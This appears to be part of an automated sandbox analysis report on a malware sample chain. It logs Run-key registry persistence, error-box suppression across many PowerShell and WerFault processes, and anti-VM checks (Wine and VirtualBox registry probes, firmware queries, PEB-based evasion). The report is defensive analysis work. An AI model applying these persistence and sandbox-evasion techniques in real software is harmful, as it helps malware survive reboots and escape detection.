                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 309de20225.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 309de20225.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2bb02869b.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2bb02869b.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
